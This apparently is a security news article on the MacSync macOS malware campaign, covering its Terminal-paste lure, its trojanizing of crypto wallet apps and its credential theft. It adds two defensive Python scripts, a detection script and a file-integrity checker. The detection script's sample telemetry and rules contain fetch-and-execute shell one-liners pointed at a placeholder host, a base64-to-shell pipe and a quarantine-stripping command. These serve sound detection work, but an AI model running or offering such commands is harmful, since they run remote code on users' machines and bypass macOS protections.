A sophisticated new malware campaign is targeting macOS users with a lethal combination of social engineering and technical stealth. Dubbed MacSync, this “Malware-as-a-Service” (MaaS) tool masquerades as a legitimate cloud storage installer to trick users into infecting their own machines, specifically hunting for cryptocurrency wallets and credentials.
The campaign, uncovered during routine threat hunting, employs a “ClickFix” lure: a tactic where victims are coerced into pasting a malicious command into their terminal to “fix” a fake error or complete an installation.
The infection begins on sites designed to look like trusted download portals. In one observed case, a domain “mimicking a Microsoft login page” redirected users to a site disguised as a “legitimate macOS cloud storage installer”.
Instead of downloading a file, the site instructs “advanced users” to perform a “Terminal installation.” “The page coerced users into copying and pasting a deceptive Terminal command,” the report explains.
This command, a seemingly benign one-liner, actually fetches a remote script that bypasses macOS security features like Gatekeeper and notarization. “By convincing victims to voluntarily execute malicious shell commands, attackers completely bypass Gatekeeper, notarization checks, and signature verification”.
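The ClickFix flow described above (a pasted Terminal one-liner that fetches and runs a remote script, sidestepping Gatekeeper and notarization) leaves a recognisable trace in process telemetry. The Python below is an added example, not code from the report or from MacSync: it runs a handful of heuristic rules over constructed process-execution lines in a hypothetical `timestamp | parent | child | command line` format and flags fetch-and-execute patterns that originate from an interactive terminal. The log format, the list of terminal applications and the rule set are all assumptions made for illustration; a real deployment would use the EDR's own process-creation events.

```python
import re
from dataclasses import dataclass

# Constructed sample of process-execution telemetry in a hypothetical
# "timestamp | parent | child | command line" format (not a real EDR export).
SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z | Terminal | bash | brew install wget
2024-05-01T10:00:07Z | Terminal | bash | curl -fsSL https://example.invalid/install.sh | bash
2024-05-01T10:00:09Z | Terminal | zsh | echo aGVsbG8= | base64 -d | sh
2024-05-01T10:01:00Z | launchd | Finder | /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder
2024-05-01T10:02:00Z | iTerm2 | zsh | bash -c "$(curl -s https://example.invalid/x)"
2024-05-01T10:03:00Z | Terminal | bash | xattr -d com.apple.quarantine ~/Downloads/Installer.app
"""

# Parent processes that indicate a human typed or pasted the command
# (assumed list; extend with whatever terminal emulators your fleet uses).
INTERACTIVE_TERMINALS = {"Terminal", "iTerm2", "Hyper", "Alacritty", "kitty"}

# Heuristic rules: name -> compiled regex applied to the command line.
# They describe "download something and hand it straight to an interpreter",
# which is exactly what a ClickFix one-liner has to do.
RULES = {
    "remote_fetch_piped_to_interpreter": re.compile(
        r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(sh|bash|zsh|python3?|osascript)\b"),
    "remote_fetch_in_command_substitution": re.compile(
        r"\$\(\s*(curl|wget)\b|`\s*(curl|wget)\b"),
    "decoded_payload_piped_to_shell": re.compile(
        r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(sh|bash|zsh)\b"),
    # Stripping the quarantine attribute is how a downloaded binary avoids
    # the Gatekeeper prompt; legitimate users rarely type this.
    "quarantine_attribute_removed": re.compile(
        r"\bxattr\b(\s+-\w+)*\s+com\.apple\.quarantine\b"),
}


@dataclass
class Finding:
    timestamp: str
    parent: str
    command: str
    rules: list        # names of the rules that fired, in RULES order
    interactive: bool  # True when the parent is a terminal emulator


def parse_event(line):
    """Split one telemetry line into (timestamp, parent, child, command).

    maxsplit=3 keeps any '|' characters inside the command line intact.
    """
    parts = [p.strip() for p in line.split("|", 3)]
    return parts if len(parts) == 4 else None


def evaluate(line):
    """Return a Finding if any rule matches the event's command line, else None."""
    parsed = parse_event(line)
    if parsed is None:
        return None
    timestamp, parent, _child, command = parsed
    fired = [name for name, rx in RULES.items() if rx.search(command)]
    if not fired:
        return None
    return Finding(timestamp, parent, command, fired,
                   parent in INTERACTIVE_TERMINALS)


def scan(text):
    """Run every line of a telemetry dump through the rules."""
    return [f for f in (evaluate(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        origin = "interactive" if f.interactive else "non-interactive"
        print(f"{f.timestamp} [{origin} parent={f.parent}] {', '.join(f.rules)}")
        print(f"    {f.command}")
```

The `interactive` flag is what separates a user who was talked into pasting a command from a build script that happens to use `curl | sh`; triage the interactive hits first. The rules are deliberately loose and will produce some noise (a developer genuinely installing a tool this way), so treat them as a hunting query or a medium-severity alert rather than a blocking control.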
Once inside, MacSync doesn’t just steal data; it digs in for the long haul. The malware is designed to “conditionally trojanize widely used Electron-based cryptocurrency applications” found on the victim’s machine.
By overwriting critical components of apps like Ledger Live or Trezor Suite, the malware transforms trusted hardware wallet companions into phishing tools. “The primary goal of both trojanized applications is to present a convincing multi-step phishing wizard that captures device PINs and full recovery phrases”.
Victims might see a helpful “Something went wrong…” screen weeks after the initial infection, prompting them to re-enter their recovery phrase to “fix” the issue, handing over the keys to their crypto assets in the process.
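Because the trojanization described above overwrites files inside an already-installed wallet application, the most direct defensive check is file integrity: record what the bundle looked like when it was installed from a trusted source, then compare later. The Python below is an added example, not code from the report or from either wallet vendor. It hashes the Electron resources under an application bundle, stores a baseline manifest, and reports modified, added and removed files; the `demo()` function builds a constructed fake bundle in a temporary directory and simulates one component being overwritten. The bundle layout, the list of watched file types and the path names are assumptions for illustration.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# File types inside an Electron app bundle that a trojanized build is most
# likely to replace (assumed set; app.asar holds the packed renderer code).
WATCHED_SUFFIXES = (".asar", ".js", ".html", ".dylib", ".node")


def hash_file(path, chunk=1 << 16):
    """SHA-256 of a file, read in chunks so large .asar archives do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(bundle_root):
    """Map each watched file under the bundle (path relative to the bundle) to its hash."""
    root = Path(bundle_root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in WATCHED_SUFFIXES:
            manifest[path.relative_to(root).as_posix()] = hash_file(path)
    return manifest


def save_manifest(manifest, out_path):
    Path(out_path).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(in_path):
    return json.loads(Path(in_path).read_text())


def compare(baseline, current):
    """Diff two manifests; any non-empty list means the bundle changed since baselining."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo():
    """Constructed scenario: baseline a fake wallet bundle, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        bundle = Path(tmp) / "Wallet.app"          # hypothetical bundle name
        res = bundle / "Contents" / "Resources"
        res.mkdir(parents=True)
        (res / "app.asar").write_bytes(b"original packed renderer")
        (res / "icon.icns").write_bytes(b"icon")                    # not watched
        (bundle / "Contents" / "Info.plist").write_text("<plist/>")  # not watched

        manifest_path = Path(tmp) / "baseline.json"
        save_manifest(build_manifest(bundle), manifest_path)

        # Simulate what the report describes: a core component overwritten in
        # place, plus an extra script dropped alongside it (constructed content).
        (res / "app.asar").write_bytes(b"replacement renderer with fake recovery wizard")
        (res / "loader.js").write_bytes(b"// constructed extra file")

        return compare(load_manifest(manifest_path), build_manifest(bundle))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a real Mac this complements, rather than replaces, Apple's own signature check (`codesign --verify --deep --strict /Applications/<App>.app`): a modified `app.asar` breaks the bundle's seal, but a hash baseline also tells you which file changed and catches files the signature does not cover. Keep the baseline manifest somewhere the malware cannot rewrite it, otherwise the comparison proves nothing.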
MacSync is marketed as a budget-friendly option for cybercriminals. “Marketed as an affordable Malware-as-a-Service offering on underground forums, MacSync has gained traction among lower-tier affiliates due to its low price point”.
Despite its low cost, its capabilities are advanced. It systematically harvests “browser credentials, cryptocurrency wallet data, Keychain contents, and sensitive files,” making it a potent threat to individual users and organizations alike.
The report concludes with a warning: technical defenses can only go so far against social engineering. “MacSync proves that on macOS, the most dangerous malware isn’t the one that exploits a zero-day, it’s the one that exploits trust”.
The best defense remains simple: “never paste random commands into Terminal, no matter how ‘official’ they look”.